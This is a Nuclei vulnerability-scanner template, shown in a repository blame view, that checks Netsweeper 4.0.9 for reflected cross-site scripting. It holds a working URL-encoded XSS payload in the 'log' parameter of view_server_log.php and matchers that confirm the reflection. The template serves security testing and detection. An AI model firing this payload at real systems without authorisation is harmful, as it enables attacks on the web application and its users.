nuclei-templates/vulnerabilities/netsweeper/netsweeper-rxss.yaml

31 lines
787 B
YAML
Raw Normal View History

id: netsweeper-rxss
2021-12-06 16:38:54 +00:00
info:
name: Netsweeper 4.0.9 - Cross-Site Scripting
2021-12-06 16:38:54 +00:00
author: daffainfo
severity: medium
reference:
- https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz
2021-12-06 16:38:54 +00:00
tags: netsweeper,xss
requests:
- method: GET
path:
- '{{BaseURL}}/webadmin/reporter/view_server_log.php?server=localhost&act=stats&filename=&offset=1&count=1000&sortorder=&log=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&offset=&sortitem=&filter='
2021-12-06 16:38:54 +00:00
matchers-condition: and
matchers:
- type: word
part: body
words:
- '</script><script>alert(document.domain)</script>'
2021-12-06 16:38:54 +00:00
- type: word
part: header
words:
- text/html
- type: status
status:
- 200